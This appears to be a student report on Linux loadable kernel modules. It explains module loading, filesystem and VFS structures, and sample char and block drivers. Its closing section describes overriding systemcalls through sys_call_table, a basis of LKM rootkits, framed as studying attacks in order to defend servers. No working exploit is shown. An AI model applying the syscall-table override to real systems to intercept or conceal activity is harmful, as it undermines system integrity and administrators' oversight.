    3.4 System calls implementation in Modularized approach

    User space programs use system calls to get services from the kernel. For example, there are system calls to read a file, to create a new process, and to shut down the system. Most system calls are integral to the system and very standard, so are always built into the base kernel (no LKM option). But we can invent a system call of our own and install it as an LKM. Or we can decide that we don't like the way Linux does something and override an existing system call with an LKM of our own.
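
    From the user-space side, a system call is normally reached through a C library wrapper, but on Linux it can also be invoked by number through the generic syscall() function. The sketch below assumes Linux with glibc; the function name raw_getpid is hypothetical.

```c
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/* Invokes the getpid system call by its number instead of through the
 * getpid() wrapper of the C library. */
long raw_getpid(void)
{
    return syscall(SYS_getpid);
}
```

    Both paths end in the same kernel routine, so raw_getpid() and getpid() return the same value. A module that overrides a system call changes what every such caller receives.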

    3.5 Finding Exploit of Kernel loadable Module

    It is very difficult for an administrator to protect a server from attackers who use LKMs as their hacking tool, because their way of attack is hard to predict. Loadable kernel modules are thus especially well suited to such abuse, and we have to know how attackers use them before we take any steps to secure our servers. In this project I describe some ideas and exploits of LKMs, and I am also trying to develop some utilities to protect our servers from this type of attack. A detailed analysis of how LKMs are used in exploits can enable us to identify the cause of a malfunction when it has been introduced to the server by an LKM. Moreover, this knowledge will also enable us to provide a remedy for such LKM exploit attacks. For this we need to know how LKMs work and how an exploit can be written.

System Implementations

    Every LKM has two main functions: one initializes the module when it is loaded into kernel memory, and the other cleans up when the module is removed from kernel memory.
    
    int init_module(void) /* used for all initialization work */
    {
    	. . .
    }
    
    void cleanup_module(void) /* used for a clean removal */
    {
    	. . .
    }
    

    Loading a module is normally restricted to root and is done by issuing the following command:

    # insmod modulename.o

    This command makes the system do the following:

    · Load the object file.
    · Call the create_module system call to allocate kernel memory for the relocated module.
    · Resolve the unresolved references against the kernel symbols, which are obtained with the system call "get_kernel_syms".
    · Call the init_module system call, which copies the module into kernel memory and runs its initialization function.




    Linking a module to the kernel

    An Example of Simple LKM

    This LKM only uses a print function to write a message to the kernel log, which also appears in the system log file.



    /* helloworld.c */
    #define MODULE
    #define __KERNEL__
    
    #include <linux/module.h>
    #include <linux/kernel.h>
    
    int init_module (void)
    {
    	printk ("<1> Hello World ……I am Loading…\n");
    	return 0;
    }
    
    void cleanup_module (void)
    {
    	printk("<1> Bye bye \n");
    }
    


    Here we have used printk("…") in place of printf("…") because a module runs in kernel space, where the user space C library is not available.

    The module is compiled with the following command:

    # gcc -c -O3 helloworld.c

    This will produce an object file named "helloworld.o".

    We can install it into kernel memory with

    # insmod helloworld.o

    We can see a list of the loaded kernel modules by issuing the following command

    # lsmod

    It shows a table of the loaded LKMs with some information about each. An example is given below.

    Module 		Pages 	Used by
    
    helloworld		1		0


    What Does "lsmod" command do?

    This command reads /proc/modules to show which modules are loaded at the moment. The `Pages' field is the memory information: how many pages the module occupies. The `Used by' field tells us how many users the module currently has in the system (the reference count).

    The module can be removed only when this counter is zero. After checking this, the command is

    # rmmod helloworld
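
    The reference count check described above can be sketched in user space. The following is a minimal sketch, assuming each line of the module table carries exactly the three columns of the lsmod listing above (name, pages, used by); the real /proc/modules layout differs between kernel versions, and the names mod_info, parse_module_line and can_remove are hypothetical.

```c
#include <stdio.h>

/* One row of the module table, using the three columns shown by lsmod.
 * The struct and function names are hypothetical. */
struct mod_info {
    char name[64];        /* module name */
    unsigned long pages;  /* memory pages occupied by the module */
    int used_by;          /* reference count */
};

/* Parse a line of the assumed form "name pages used_by".
 * Returns 0 on success, -1 if the line does not have three fields. */
int parse_module_line(const char *line, struct mod_info *out)
{
    if (sscanf(line, "%63s %lu %d", out->name, &out->pages, &out->used_by) != 3)
        return -1;
    return 0;
}

/* A module may be removed only when nothing references it. */
int can_remove(const struct mod_info *m)
{
    return m->used_by == 0;
}
```

    For the line "helloworld 1 0" the parsed reference count is zero, so can_remove() reports that the module may be unloaded; a line with a non-zero third column would be refused.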




4.1.1 File System Implementation



    Each Unix-like operating system makes use of its own filesystem. Although all such filesystems comply with the POSIX interface, each of them is implemented in a different way.

    The first versions of Linux were based on the Minix filesystem. As Linux matured, the Extended Filesystem (Ext FS) was introduced; it included several significant extensions but offered unsatisfactory performance [1]. The Second Extended Filesystem (Ext2) was introduced in 1994; besides including various new features, it is efficient and robust and has become the most widely used filesystem in Linux.

    The following features are included in the Ext2 filesystem:


    (i) The internal representation of a file is given by an inode, which contains a description of the disk layout of the file data and other information such as the file owner, access permissions and access times.
    (ii) When creating the filesystem, the user can choose the block size (from 1024 to 4096 bytes) according to their requirements.
    (iii) When creating the filesystem, the user can also choose the maximum number of inodes for a partition of a given size, depending on the expected number of files to be stored on it.
    (iv) It partitions disk blocks into groups. Each group includes data blocks and inodes stored in adjacent tracks, which minimizes the seek time.
    (v) The filesystem preallocates disk data blocks to regular files before they are actually used.
    (vi) Fast symbolic links are supported.

    Although the filesystem includes these features, it has a problem: after an abnormal shutdown the system can lose files, and recovery is poor. To remove this problem, the Ext3 filesystem adds a journaling feature. Another journaling filesystem is ReiserFS, which stays consistent across an abnormal system halt. Similarly, IBM's JFS stays consistent and can also handle very large block sizes. One may ask how a user can load a new filesystem into an existing kernel. The answer is that it can be done through loadable kernel modules. Filesystem drivers are built with a modularized approach: they implement the operations behind the conventional system calls such as open, read, write and dup, and they can be loaded into a running kernel.
    Filesystem development and improvement have become easy to carry out in the kernel. This was a tedious job before the modularized approach arrived, because kernel compilation was then mandatory for any kind of change in the kernel. The modularized approach to filesystem implementation removes this problem.
    In order to support multiple filesystems, Linux contains a special kernel interface level called VFS (Virtual Filesystem Switch). This is similar to the vnode/vfs interface found in SVR4 derivatives (originally it came from BSD and Sun's original implementations).


    A File System has the following structure



    Boot block It occupies the beginning of a filesystem, typically the first sector, and may contain the bootstrap code that is read into the machine to boot, or initialize, the operating system.

    Super Block It describes the state of a filesystem: how large it is, how many files it can store, where to find free space, and other information.

    Inode List It is a list of inodes that follows the super block in the filesystem. The kernel references inodes by index into the inode list.


    A view of inode structure.


      The Data Block The data blocks start at the end of the inode list and contain file data and administrative data. An allocated data block can belong to one and only one file in the filesystem.


      The Linux inode cache is implemented in a single file (fs/inode.c) and has the following structure.



      A global hash table It is the inode hash table, where each inode is hashed by the value of the superblock pointer and the 32-bit inode number.

      A global type in_use list It is the list (inode_in_use) which contains valid inodes with i_count > 0 and i_nlink > 0.

      A global type unused list It is the list (inode_unused) which contains valid inodes with i_count = 0.

      A per-superblock type dirty list It is used as 'sb->s_dirty' and contains valid inodes with i_count > 0, i_nlink > 0 and i_state & I_DIRTY.

      Inode cache proper (inode_cachep) A SLAB cache called inode_cachep. As inode objects are allocated and freed, they are taken from and returned to this SLAB cache. The type lists are anchored from inode->i_list, the hash table from inode->i_hash. Each inode can be on a hash table and on one of the type lists, and all these lists are protected by a single spinlock (i.e. inode_lock).

      The inode cache subsystem is initialized when the inode_init() function is called from start_kernel() in init/main.c. The function is marked as __init, which means its code is thrown away later on.



    Filesystem Registration and Unregistration through modules This gives Linux an easy mechanism for writing a new filesystem with minimum effort. It is the VFS interface, which is implemented by all Linux filesystems built as modules. Let us consider the steps required to implement a filesystem in Linux. The code that implements a filesystem can be either a dynamically loadable module or statically linked into the kernel; here we choose the first. All that is needed is to fill in a struct file_system_type structure and register it with the VFS using the register_filesystem() function, as in the following example.



    	#include "linux/module.h"
    	#include "linux/init.h"
    	#include "linux/fs.h"	/* register_filesystem(), DECLARE_FSTYPE_DEV */
    
    	static struct super_block *kfs_read_super(struct super_block *, void *, int);
    	static DECLARE_FSTYPE_DEV(kfs_fs_type, "kfs", kfs_read_super);
    
    	/* called when the module is loaded */
    	static int __init init_kfs_fs(void)
    	{
    		return register_filesystem(&kfs_fs_type);
    	}
    
    	/* called when the module is removed */
    	static void __exit exit_kfs_fs(void)
    	{
    		unregister_filesystem(&kfs_fs_type);
    	}
    
    	module_init(init_kfs_fs)
    	module_exit(exit_kfs_fs)
    


    The module_init() and module_exit() macros ensure that, when KFS is compiled as a module, the functions init_kfs_fs() and exit_kfs_fs() turn into init_module() and cleanup_module() respectively; if KFS is statically linked into the kernel, the exit_kfs_fs() code vanishes as it is unnecessary.



    The structure file_system_type is described as follows :

    	
    	struct file_system_type {
    		const char *name;
    		int fs_flags;
    		struct super_block *(*read_super)(struct super_block *, void *, int);
    		struct module *owner;
    		struct vfsmount *kern_mnt; /* For kernel mount */
    		struct file_system_type *next;
    	};
    
    The fields are explained here

    name
    Human-readable name, used as a key to find a filesystem by its name; the same name is given as the filesystem type in mount, and it should be unique.

    fs_flags
    One or more (ORed) of the flags: FS_REQUIRES_DEV for a filesystem that can only be mounted on a block device, FS_SINGLE for a filesystem that can have only one superblock.

    read_super
    A pointer to the function that reads the superblock during the mount operation.

    owner
    This is a pointer to the module that implements this filesystem. If the filesystem is statically linked into the kernel then it is set to NULL.

    kern_mnt
    It is for FS_SINGLE filesystems only. This is set by kern_mount().

    next
    It is the linkage into the singly-linked list headed by file_systems. The list is protected by the file_systems_lock read-write spinlock, and the functions register/unregister_filesystem() modify it by linking and unlinking the entry from the list.
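
    The linking and unlinking of entries on that singly-linked list can be illustrated with a small user space sketch. It is only a model under stated assumptions: struct fs_type is a reduced stand-in for struct file_system_type, the sketch_ function names are hypothetical, no locking is done (the kernel takes file_systems_lock), and the -EBUSY and -EINVAL return values are my assumption about how duplicate and unknown entries are reported.

```c
#include <errno.h>
#include <stddef.h>
#include <string.h>

/* Reduced, user space stand-in for struct file_system_type. */
struct fs_type {
    const char *name;
    struct fs_type *next;
};

static struct fs_type *fs_list_head;   /* plays the role of file_systems */

/* Return the address of the link that points at "name", or of the
 * terminating NULL link if the name is not registered. */
static struct fs_type **find_fs(const char *name)
{
    struct fs_type **p;

    for (p = &fs_list_head; *p; p = &(*p)->next)
        if (strcmp((*p)->name, name) == 0)
            break;
    return p;
}

/* Append fs to the list unless its name is already taken. */
int sketch_register_fs(struct fs_type *fs)
{
    struct fs_type **p = find_fs(fs->name);

    if (*p)
        return -EBUSY;          /* assumed error for a duplicate name */
    fs->next = NULL;
    *p = fs;
    return 0;
}

/* Unlink exactly this entry (compared by address, not by name). */
int sketch_unregister_fs(struct fs_type *fs)
{
    struct fs_type **p;

    for (p = &fs_list_head; *p; p = &(*p)->next) {
        if (*p == fs) {
            *p = fs->next;
            fs->next = NULL;
            return 0;
        }
    }
    return -EINVAL;             /* assumed error for an unknown entry */
}
```

    Walking the list through a pointer to the link, rather than a pointer to the entry, lets both functions insert or remove an element without treating the list head as a special case.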

    The file table structure is given below

    
    struct files_struct {
    	atomic_t count;
    	rwlock_t file_lock;
    	int max_fds;
    	int max_fdset;
    	int next_fd;
    	struct file **fd;	 /* current fd array */
    	fd_set *close_on_exec;
    	fd_set *open_fds;
    	fd_set close_on_exec_init;
    	fd_set open_fds_init;
    	struct file *fd_array[NR_OPEN_DEFAULT];
    };
    


    The file->count is a reference count, incremented by get_file() and decremented by fput() and by put_filp().



    The tsk->files can be shared between parent and child if the child thread was created using the clone() systemcall with CLONE_FILES set in the clone flags argument.



    When a file is opened, the file structure allocated for it is installed into the current->files->fd[fd] slot and an fd bit is set in the bitmap current->files->open_fds. All this is done under the write protection of the current->files->file_lock read-write spinlock. When the descriptor is closed, the fd bit is cleared in current->files->open_fds and current->files->next_fd is set equal to fd as a hint for finding the first unused descriptor the next time this process wants to open a file.
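
    The bookkeeping of open_fds and next_fd described above can be modelled in user space. This is a minimal sketch, not the kernel code: the table is limited to a hypothetical 32 descriptors so that one unsigned long can serve as the bitmap, no lock is taken, and all sk_ names are invented for the illustration. It also assumes that the hint is only lowered on close, never raised.

```c
#include <stddef.h>

#define SK_MAX_FDS 32   /* hypothetical small table size for the sketch */

struct sk_files {
    unsigned long open_fds;   /* bit n set => descriptor n is in use */
    int next_fd;              /* hint: where to start searching */
    void *fd[SK_MAX_FDS];     /* stand-in for the struct file pointers */
};

/* Install "file" in the first free slot at or after next_fd.
 * Returns the descriptor, or -1 if the table is full. */
int sk_install(struct sk_files *f, void *file)
{
    int fd;

    for (fd = f->next_fd; fd < SK_MAX_FDS; fd++) {
        if (!(f->open_fds & (1UL << fd))) {
            f->open_fds |= 1UL << fd;   /* mark descriptor as open */
            f->fd[fd] = file;
            f->next_fd = fd + 1;        /* next search starts above it */
            return fd;
        }
    }
    return -1;
}

/* Release a descriptor; returns 0 on success, -1 if it was not open. */
int sk_close(struct sk_files *f, int fd)
{
    if (fd < 0 || fd >= SK_MAX_FDS || !(f->open_fds & (1UL << fd)))
        return -1;
    f->open_fds &= ~(1UL << fd);        /* clear the fd bit */
    f->fd[fd] = NULL;
    if (fd < f->next_fd)
        f->next_fd = fd;                /* hint for the next open */
    return 0;
}
```

    With descriptors 0, 1 and 2 open, closing 1 moves the hint back to 1, so the next open reuses descriptor 1 and the one after that gets 3.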


    The File Structure Management
    struct  fown_struct {
    	int pid; 		/* pid or -pgrp where SIGIO should be sent 	*/
    	uid_t uid,euid;	/* uid or euid of process setting the owner 	*/
    	int signum;		/* posix1.b rt signal to be delivered on IO	*/
    };
    
    struct file {
    	struct  list_head	 f_list;
    	struct  dentry		*f_dentry;
    	struct	vfsmount	*f_vfsmnt;
    	struct	file_operations *f_op;
    	atomic_t		 f_count;
    	unsigned int		f_flags;
    	mode_t		f_mode;
    	loff_t			f_pos;
    	unsigned long	f_reada, f_ramax, f_raend, f_ralen, f_rawin;
    	struct fown_struct	f_owner;
    	unsigned int 		f_uid, f_gid;
    	int			f_error;
    	unsigned long	f_version;
    /*	needed for tty driver , and may be for others	*/
    	void			*private_data;
    };
    



    Now we can describe each element of the structure briefly, as follows -


      f_list : this field links the file structure on one (and only one) of these lists:
      a) sb->s_files, the list of all open files on this filesystem; if the corresponding inode is not anonymous, then dentry_open() (called by filp_open()) links the file into this list;
      b) fs/file_table.c : free_list, containing unused file structures;
      c) fs/file_table.c : anon_list; when a new file structure is created by get_empty_filp(), it is placed on this list. All these lists are protected by the files_lock spinlock.


      f_dentry : the dentry corresponding to this file. The dentry is created at nameidata lookup time by open_namei() (or rather path_walk(), which it calls), but the actual file->f_dentry field is set by dentry_open() to contain the dentry thus found.

      f_vfsmnt : the pointer to the vfsmount structure of the filesystem containing the file. This is set by dentry_open() but is found as part of the nameidata lookup by open_namei() (or rather path_init(), which it calls).

      f_count : reference count manipulated by get_file/put_filp/fput.

      f_flags : O_XXX flags from the open(2) system call, copied there (with slight modifications by filp_open()) by dentry_open() after clearing O_CREAT, O_EXCL, O_NOCTTY and O_TRUNC.

      f_mode : a combination of userspace flags and mode, set by dentry_open(). The point of the conversion is to store read and write access in separate bits, so one can do easy checks like (f_mode & FMODE_WRITE) and (f_mode & FMODE_READ).

      f_pos : the current file position for the next read or write to the file. Under i386 it is of type long long, a 64-bit value.

      f_reada, f_ramax, f_raend, f_ralen, f_rawin : used to support readahead.

      f_owner : owner of file I/O, who receives asynchronous I/O notifications via the SIGIO mechanism.

      f_uid, f_gid : set to the user id and group id of the process that opened the file.

      f_error : used by the NFS client to return write errors.

      f_version : versioning mechanism for invalidating caches.
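
    The f_mode conversion mentioned in the list above can be shown with a short user space sketch. It assumes the usual Linux encoding of the access mode (O_RDONLY = 0, O_WRONLY = 1, O_RDWR = 2) and, as far as I can tell from the 2.4 sources, mirrors the expression used by dentry_open(); the SK_ constants and the function name are hypothetical stand-ins for FMODE_READ and FMODE_WRITE.

```c
#include <fcntl.h>

#define SK_FMODE_READ  1   /* stand-in for FMODE_READ */
#define SK_FMODE_WRITE 2   /* stand-in for FMODE_WRITE */

/* Turn the two-bit access mode of the open(2) flags into separate
 * read and write bits: adding one maps 0 -> 1 (read), 1 -> 2 (write)
 * and 2 -> 3 (read and write). Flags outside O_ACCMODE are masked off. */
unsigned int sk_open_flags_to_mode(int flags)
{
    return (unsigned int)(flags + 1) & O_ACCMODE;
}
```

    After the conversion a driver can test (mode & SK_FMODE_WRITE) directly, which would not work on the raw flags because O_RDONLY is zero.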


    The interface for filesystem writers had to be very simple so that people could try to reverse engineer existing proprietary filesystems by writing read-only versions of them. Therefore the Linux modularized filesystem driver makes it easy to implement a read-only filesystem. In a world where people still use non-Linux operating systems to protect their investment in legacy software, Linux had to provide interoperability by supporting a great multitude of different filesystems, most of which would not deserve to exist on their own but only for compatibility with existing non-Linux operating systems.



4.1.2 Device Drivers Implementations




    The kernel interacts with I/O devices by means of a software interface called a device driver. Device drivers are generally included in the kernel, so they live in kernel memory, and consist of kernel data structures and some functions that control one or more devices.

    Some Device Drivers

    Block Driver : These communicate with the OS through a collection of fixed-size buffers.
    Character Driver : These can handle I/O requests of arbitrary size and can be used to support almost any type of device.

    Main difference between Character Device and Block Device


    · User processes interact with block devices only indirectly, through the buffer cache.
    · The relationship of a user process with a character device is direct.


    There is also another type of driver, STREAMS (in uppercase). It was first introduced by AT&T in Unix System V Release 3 and makes it possible to stack protocol processing modules between the user process and the driver. Our ultimate aim is to write a modularized character driver, which I will discuss in the subsequent sections. Take as an example the driver "scull", a short and simple character driver that serves to demonstrate driver properties. This character driver is not hardware dependent. It just acts on some memory allocated using kmalloc. Since our device is a part of the computer's memory, we are free to do what we want with it.


    A device like this consists of a memory area that is both global and persistent. Global means that if the device is opened multiple times, the data contained within the device is shared by all the file descriptors that opened it. Persistent means that if the device is closed and reopened, data is not lost. Another property of this device is that it can act like a pipe: one process reads what another process writes. If multiple processes read the same device, they contend for data. This property of the device shows how blocking and non-blocking read and write can be implemented without having to resort to interrupts, although real drivers synchronize with their devices using hardware interrupts.

    Major and Minor Numbers

    Char devices are accessed through names in the filesystem. Those names are called special files, device files, or simply nodes of the filesystem tree. They are conventionally located in the /dev directory (considering GNU/Linux). Special files for character drivers are identified by a "c" in the first column of the output of "ls -l" in the /dev directory. Block devices also appear in the /dev directory, but they are identified by a "b" in the same way. For device files, the output of the above command also shows two numbers, which are known as the major number and the minor number.

    The major number identifies the driver associated with the device. For example, /dev/zero and /dev/null are both managed by driver 1, whereas virtual consoles and serial terminals are managed by driver 4. The kernel uses the major number at open time to dispatch execution to the appropriate driver.

    The minor number is used only by the driver specified by the major number. Other parts of the kernel do not use it, and merely pass it along to the driver. It is common for a driver to control several devices; the minor number provides a way for the driver to differentiate among them.
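
    The way a device number is split and then used to find the driver can be sketched in user space. The sketch assumes the 16-bit device number of the 2.x kernels, with the major number in the upper 8 bits and the minor number in the lower 8 bits, and a table of 255 character driver slots. Handing out a free major from the top of the table when 0 is requested is my assumption about the kernel's behaviour. All SK_ and sk_ names are hypothetical.

```c
#include <errno.h>
#include <stddef.h>

#define SK_MINORBITS 8
#define SK_MAJOR(dev)    ((unsigned int)((dev) >> SK_MINORBITS))
#define SK_MINOR(dev)    ((unsigned int)((dev) & ((1U << SK_MINORBITS) - 1)))
#define SK_MKDEV(ma, mi) ((unsigned short)(((ma) << SK_MINORBITS) | (mi)))

#define SK_MAX_CHRDEV 255   /* assumed number of character driver slots */

/* Driver table indexed by major number; NULL means the slot is free. */
static const char *sk_chrdevs[SK_MAX_CHRDEV];

/* Claim a major number for a driver. With major == 0 a free slot is
 * searched from the top and its number is returned; otherwise 0 is
 * returned on success. Negative values are errors. */
int sk_register_chrdev(unsigned int major, const char *name)
{
    if (major == 0) {
        for (major = SK_MAX_CHRDEV - 1; major > 0; major--) {
            if (sk_chrdevs[major] == NULL) {
                sk_chrdevs[major] = name;
                return (int)major;
            }
        }
        return -EBUSY;
    }
    if (major >= SK_MAX_CHRDEV)
        return -EINVAL;
    if (sk_chrdevs[major] != NULL)
        return -EBUSY;
    sk_chrdevs[major] = name;
    return 0;
}

/* What happens at open time: only the major number selects the driver;
 * the minor number is left for the driver itself to interpret. */
const char *sk_driver_for(unsigned short dev)
{
    unsigned int major = SK_MAJOR(dev);

    return major < SK_MAX_CHRDEV ? sk_chrdevs[major] : NULL;
}
```

    In this model a device node created with major 40 and minor 0 resolves to whichever driver claimed slot 40, and a request for a dynamic major on an otherwise empty table yields 254.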

    Adding a new driver to the system means assigning a major number to it. The assignment should be made in the driver module's initialisation function by invoking the following function, defined in "linux/fs.h" :

    	 int register_chrdev(unsigned int major, const char *name,
    		struct file_operations *fops);	
    
    The command to create a device node on a filesystem is mknod.

    mknod /dev/scull0 c 254 0

    The scull driver implements only the most important device methods, and uses the tagged format to declare its file_operations structure:
    
    struct file_operations scull_fops = {
    	llseek : scull_llseek,
    	read : scull_read,
    	write : scull_write,
    	ioctl : scull_ioctl,
    	open : scull_open,
    	release : scull_release,
    };
    
    Here is a sample device driver implementation (this is a very basic driver, just for demonstration; it implements nearly no operations) -
    #define MODULE
    #define __KERNEL__
    
    #include "linux/module.h"
    #include "linux/kernel.h"
    #include "asm/unistd.h"
    #include "sys/syscall.h"
    #include "sys/types.h"
    #include "asm/fcntl.h"
    #include "asm/errno.h"
    #include "linux/types.h"
    #include "linux/dirent.h"
    #include "sys/mman.h"
    #include "linux/string.h"
    #include "linux/fs.h"
    #include "linux/malloc.h"
    
    /*just a dummy for demonstration*/
    static int driver_open(struct inode *i, struct file *f) {
     printk("Open Function\n");
     return 0;
    }
    /*register every function which will be provided by our driver*/
    static struct file_operations fops = {
    NULL,                 /*lseek*/
    NULL,                 /*read*/
    NULL,                 /*write*/
    NULL,                 /*readdir*/
    NULL,                 /*select*/
    NULL,                 /*ioctl*/
    NULL,                 /*mmap*/
    driver_open,          /*open, take a look at my dummy open function*/
    NULL,                 /*release*/
    NULL                  /*fsync...*/
    };
    
    
    int init_module(void)
    {
    		 /*register driver with major 40 and the name driver*/
     if(register_chrdev(40, "driver", &fops)) return -EIO;
      return 0;
    }
    
    void cleanup_module(void)
    {
    		 /*unregister our driver*/
     unregister_chrdev(40, "driver");
    }
    


    The most important function is register_chrdev(...), which registers our driver with the major number 40. If we want to access this driver, we should do the following :

    # mknod /dev/driver c 40 0

    # insmod driver.o



    After this we can access that device. The file_operations structure provides every function (operation) which our driver will provide to the system. As we can see this implementation is a very basic dummy function just printing something. It should be clear that we can implement our own devices in a very easy way by using the methods above.




    The layout of a scull device (char device )

    Our discussion thus far has been limited to char drivers. As explained earlier, char drivers are not the only type of device driver used in Linux systems. Block drivers provide access to block-oriented devices, those that transfer data in randomly accessible, fixed-size blocks. The classic block device is a disk drive.

    The char device interface is cleaner and simpler than the block device interface. Like char devices, block device drivers in the kernel are identified by major numbers. Block major numbers are entirely distinct from char major numbers, however. A block device with major number 32 can coexist with a char device using the same major number, since the two ranges are separate.

    The functions for registering and unregistering block devices look similar to those for char devices:

    #include "linux/fs.h"
    int register_blkdev(unsigned int major, const char *name, 
        struct block_device_operations *bdops);
    int unregister_blkdev(unsigned int major, const char *name);


    The arguments have the same general meaning as for char devices, and major numbers can be assigned dynamically in the same way. So the sbull (a sample block device driver like 'scull' ) device registers itself in almost exactly the same way as scull did:

    result = register_blkdev(sbull_major, "sbull", &sbull_bdops);
    if (result < 0) {
        printk(KERN_WARNING "sbull: can't get major %d\n",sbull_major);
        return result;
    }
    if (sbull_major == 0) sbull_major = result; /* dynamic */
    major = sbull_major; /* Use `major' later on to save typing */



    The similarity stops here, however. One difference is already evident: register_chrdev took a pointer to a file_operations structure, but register_blkdev uses a structure of type block_device_operations instead -- as it has since kernel version 2.3.38. The structure is still sometimes referred to by the name fops in block drivers; we'll call it bdops to be more faithful to what the structure is and to follow the suggested naming. The definition of this structure is as follows:

    struct block_device_operations {
        int (*open) (struct inode *inode, struct file *filp);
        int (*release) (struct inode *inode, struct file *filp);
        int (*ioctl) (struct inode *inode, struct file *filp,
                        unsigned command, unsigned long argument);
        int (*check_media_change) (kdev_t dev);
        int (*revalidate) (kdev_t dev);
    };



    The open, release, and ioctl methods listed here are exactly the same as their char device counterparts. The other two methods are specific to block devices and are discussed later. Note that there is no owner field in this structure; block drivers must still maintain their usage count manually, even in the 2.4 kernel.

    The bdops structure used in sbull is as follows:

     
    struct block_device_operations sbull_bdops = {
        open:               sbull_open,
        release:            sbull_release,
        ioctl:              sbull_ioctl,
        check_media_change: sbull_check_change,
        revalidate:         sbull_revalidate,
    };



    Note that there are no read or write operations provided in the block_device_operations structure. All I/O to block devices is normally buffered by the system (the only exception is with "raw" devices); user processes do not perform direct I/O to these devices. User-mode access to block devices usually is implicit in filesystem operations they perform, and those operations clearly benefit from I/O buffering. However, even "direct" I/O to a block device, such as when a filesystem is created, goes through the Linux buffer cache. As a result, the kernel provides a single set of read and write functions for block devices, and drivers do not need to worry about them.

    Clearly, a block driver must eventually provide some mechanism for actually doing block I/O to a device. In Linux, the method used for these I/O operations is called request; it is the equivalent of the "strategy" function found on many Unix systems. The request method handles both read and write operations and can be somewhat complex. We will get into the details of request shortly.

    For the purposes of block device registration, however, we must tell the kernel where our request method is. This method is not kept in the block_device_operations structure, for both historical and performance reasons; instead, it is associated with the queue of pending I/O operations for the device. By default, there is one such queue for each major number. A block driver must initialize that queue with blk_init_queue.

    Queue initialization and cleanup is defined as follows:

    #include "linux/blkdev.h"
    blk_init_queue(request_queue_t *queue, request_fn_proc *request);
    blk_cleanup_queue(request_queue_t *queue);
    


    The init function sets up the queue, and associates the driver's request function with the queue. It is necessary to call blk_cleanup_queue at module cleanup time. The sbull driver initializes its queue with this line of code:

    blk_init_queue(BLK_DEFAULT_QUEUE(major), sbull_request);

    Each device has a request queue that it uses by default; the macro BLK_DEFAULT_QUEUE(major) is used to indicate that queue when needed. This macro looks into a global array of blk_dev_struct structures called blk_dev, which is maintained by the kernel and indexed by major number. The structure looks like this :

     struct blk_dev_struct {
        request_queue_t     request_queue;
        queue_proc          *queue;
        void                *data;
    };


    The request_queue member contains the I/O request queue that we have just initialized. We will look at the queue member shortly. The data field may be used by the driver for its own data -- but few drivers do so.



    Registering a block Device Driver





4.1.3 New System calls Implementation

    Every OS has some functions built into its kernel, which are used for every operation on that system. The functions Linux uses are called systemcalls. They represent a transition from user to kernel space. Opening a file in user space is represented by the sys_open systemcall in kernel space. For a complete list of all systemcalls available on your system, look at /usr/include/sys/syscall.h. The following listing shows part of syscall.h.

    
    #ifndef _SYS_SYSCALL_H 
    #define _SYS_SYSCALL_H 
    #define SYS_setup 0 /* Used only by init, to get system going. */ 
    #define SYS_exit 1 
    #define SYS_fork 2 
    #define SYS_read 3 
    #define SYS_write 4 
    #define SYS_open 5 
    #define SYS_close 6 
    #define SYS_waitpid 7 
    #define SYS_creat 8
    	.
    	.
    	.
    #define SYS_setresuid 164 
    #define SYS_getresuid 165 
    #define SYS_vm86 166 
    #define SYS_query_module 167 
    #define SYS_poll 168 
    #define SYS_syscall_poll SYS_poll 
    
    #endif /* "sys/syscall.h" */
    



    Every systemcall has a defined number (see listing above), which is actually used to make the systemcall. The kernel uses interrupt 0x80 for managing every systemcall. The systemcall number and any arguments are moved to some registers (eax for the systemcall number, for example). The systemcall number is an index into a kernel array called sys_call_table[]. This array maps the systemcall numbers to the needed service functions.
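
    The role of sys_call_table[] as a table of function pointers indexed by systemcall number can be modelled in user space. The following is only a sketch: the table size, the three-argument signature, the -ENOSYS result for an empty slot and all sk_ names are assumptions made for the illustration, and nothing here touches the real kernel table.

```c
#include <errno.h>
#include <stddef.h>

#define SK_NR_SYSCALLS 256            /* hypothetical table size */

typedef long (*sk_syscall_fn)(long, long, long);

/* Plays the role of sys_call_table[]: index = systemcall number. */
static sk_syscall_fn sk_call_table[SK_NR_SYSCALLS];

/* What the int 0x80 entry code does in spirit: look up and call. */
long sk_dispatch(unsigned int nr, long a, long b, long c)
{
    if (nr >= SK_NR_SYSCALLS || sk_call_table[nr] == NULL)
        return -ENOSYS;
    return sk_call_table[nr](a, b, c);
}

/* Install fn in slot nr and return the previous entry, which is how
 * a module can add a systemcall or override an existing one. */
sk_syscall_fn sk_replace(unsigned int nr, sk_syscall_fn fn)
{
    sk_syscall_fn old;

    if (nr >= SK_NR_SYSCALLS)
        return NULL;
    old = sk_call_table[nr];
    sk_call_table[nr] = fn;
    return old;
}

/* A toy service function for the demonstration. */
long sk_sys_add(long a, long b, long c)
{
    (void)c;
    return a + b;
}

sk_syscall_fn sk_saved_add;   /* original entry kept by the "module" */
int sk_hook_calls;            /* how often the override has run */

/* An override that counts its calls and passes on to the original. */
long sk_hooked_add(long a, long b, long c)
{
    sk_hook_calls++;
    return sk_saved_add(a, b, c);
}
```

    Saving the pointer returned by sk_replace() and putting it back later corresponds to what a module should do in init_module() and cleanup_module() when it overrides an entry.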

    We can make our own customized systemcalls through our own kernel module. We have used a syscall macro for constructing our own brk call, which is like the one we know from user space (->brk(2)). The truth about the user space library functions (not all of them) is that they are implemented through such syscall macros.



    The following code shows the _syscall1(..) macro used to construct the brk(..) function (taken from /asm/unistd.h).



    
    #define _syscall1(type,name,type1,arg1) \
    type name(type1 arg1) \
    { \
    long __res; \
    __asm__ volatile ("int $0x80" \
    : "=a" (__res) \
    : "0" (__NR_##name),"b" ((long)(arg1))); \
    if (__res >= 0) \
    return (type) __res; \
    errno = -__res; \
    return -1; \
    }


    The code looks complex, but it just calls interrupt 0x80 with the arguments provided by the _syscall1 parameters; name stands for the systemcall we need (the name is expanded to __NR_name, which is defined in /asm/unistd.h). This is how the brk function is implemented. Functions with a different number of arguments are implemented through other macros (_syscallX, where X stands for the number of arguments).

    We can use another way of implementing functions; look at the following example : 
    int (*open)(char *, int, int); /*declare a prototype*/
    open = sys_call_table[SYS_open];  /*we can also use __NR_open*/
    


    This way we don't need to use any syscall macro; we just use the function pointer from the 'sys_call_table'. These are the ways of constructing user-space-like functions that are used in the well-known LKM utilities. But we must be careful when supplying arguments to those systemcalls: they expect their arguments in user space, not in our kernel space.

